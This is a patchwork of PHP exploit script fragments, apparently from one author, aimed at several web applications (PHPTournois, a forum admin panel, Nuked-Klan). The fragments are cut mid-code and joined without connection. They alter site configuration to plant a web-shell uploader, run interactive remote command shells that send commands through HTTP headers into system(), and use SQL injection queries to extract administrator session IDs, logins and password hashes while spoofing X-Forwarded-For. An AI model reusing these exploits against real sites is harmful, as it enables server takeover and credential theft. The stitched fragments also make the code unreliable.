$xpl->post($url . '?page=configuration&op=modify', $postdata); print "done\n"; $success = true; if ($mode == 0) { print " * loading uploader\t"; $xpl->addheader("upload", "1"); if (preg_match("#upfiledone#i", $xpl->get($url))) { print "done\n"; } else { $success = false; print "error\n"; } } else { print "\n\$shell> "; while (!preg_match("#^(quit|exit)\$#", $cmd = trim(fgets(STDIN)))) { $xpl->reset('header'); $xpl->addheader('Shell', "system('{$cmd}');"); $xpl->get($url); $data = explode('123456789', $xpl->getcontent()); print $data[1] . "\n\$shell> "; } } /* Reinitialize website name and homepage and erase user avatar */ print " * repairing homepage\t"; $xpl->get('http://myannu.fr/?page=avatars&op=delete&id=1&mode=J'); $postdata = "nomsite={$all['1']}&urlsite={$url}&logo=logo.gif&pagestart=accueil&inscription_equipe=1&places=200&emailcontact=&emailinscription=&langue=english&theme=phptournois&gzip=1&poulewin=3&poulenull=2&pouleloose=1&poulefor=0&information=®lement=&decharge=&shoutbox=1&shoutlimit=20&shoutboxc=255&news=1&ladder=1&messagerie=1&support=0&faq=1&serveur=1&download=1&liens=1&galerie=1&livredor=1&sponsors=0&partenaires=1&forum=1&contact=1&horloge=1&commande=1&avatar=A&avatar_upload=1&avatar_remote=1&avatar_gallerie=0&avatar_filesize_max=100000&avatar_x_max=80&avatar_y_max=80&irc=1&ircserver=euroserv.fr.quakenet.org&ircport=6667&ircpassword=&ircchannels=%23phptournois+%23lan+%23lan.cs+%23lan.q3&mail=N&smtpserver=&smtpuser=&smtppassword="******"done\n"; if ($success) { print "\n * uploader: " . $url . "w00t.php\n"; }
if (!preg_match("#<option value='(\\S+)'#", $xpl->getcontent(), $styles)) { $styles[1] = "xml_BlueLight"; } $xpl->post($url . 'myadmin.php?action=create', "title={$name}&filename={$name}&passwd=&style=" . $styles[1] . "&structure=1&subject="); $xpl->get($url . 'myadmin.php?choix=1'); if (!preg_match_all("#action=hide_forum&id=([0-9]+)#", $xpl->getcontent(), $fid)) { die("\nsploit> Can't retrieve the forum id"); } $forumid = $fid[1][count($fid[1]) - 1]; $xpl->get($url . "myadmin.php?choix=1&action=hide_forum&id={$forumid}"); print "\nsploit> Done\nstatus> Trying to include the picture\n\$shell> "; if (empty($avatarur)) { $avatarur = "./avatar/{$name}.jpg"; } $xpl->post($url . "myadmin.php?action=rec_perso&id={$forumid}&choix=3", "PARAM%5Btop_url%5D={$avatarur}"); $xpl->reset(); while (!preg_match("#^(quit|exit)\$#", $cmd = trim(fgets(STDIN)))) { $xpl->addheader("Referer", $cmd); $xpl->get($url . $name . '.php'); $data = explode("337666733", $xpl->getcontent()); print $data[1] . "\n\$shell> "; } /* * * Copyright (C) darkfig * * This program is free software; you can redistribute it and/or * modify it under the terms of the GNU General Public License * as published by the Free Software Foundation; either version 2 * of the License, or (at your option) any later version. *
} $queries = array(); $queries[] = array(" SID", "SELECT id FROM nuked_sessions WHERE user_id=(SELECT id FROM {$prefix}users WHERE niveau>=9 ORDER BY date LIMIT 0,1) LIMIT 0,1"); $queries[] = array(" UID", "SELECT id FROM nuked_users WHERE niveau>=9 LIMIT 0,1"); $queries[] = array(" Login", "SELECT pseudo FROM nuked_users WHERE niveau>=9 LIMIT 0,1"); $queries[] = array("Password", "SELECT pass FROM nuked_users WHERE niveau>=9 LIMIT 0,1"); $xpl->agent("Mozilla Firefox"); $xpl->addheader("X-Forwarded-For", "127.0.0.1"); $ctmp = $xpl->get($url . "index.php?file=Stats&page=visits"); if (preg_match('#<a href="javascript:history.back\\(\\)"><b>[^<]+</b>#i', $ctmp)) { exit("[*] You don't have rights to access Stats page.\n"); } if (preg_match('#<a href="index.php\\?file=User&op=login_screen">[^<]+</a> | <a href="index.php\\?file=User&op=reg_screen">[^<]+</a>#i', $ctmp)) { exit("[*] You must be registered, use -user param.\n"); } $xpl->reset("header"); $xpl->agent("Mozilla Firefox"); attack1(); attack2(); } function getparam($param, $opt = '') { global $argv; foreach ($argv as $value => $key) { if ($key == '-' . $param) { return $argv[$value + 1]; } } if ($opt) { exit("\n-{$param} parameter required"); } else {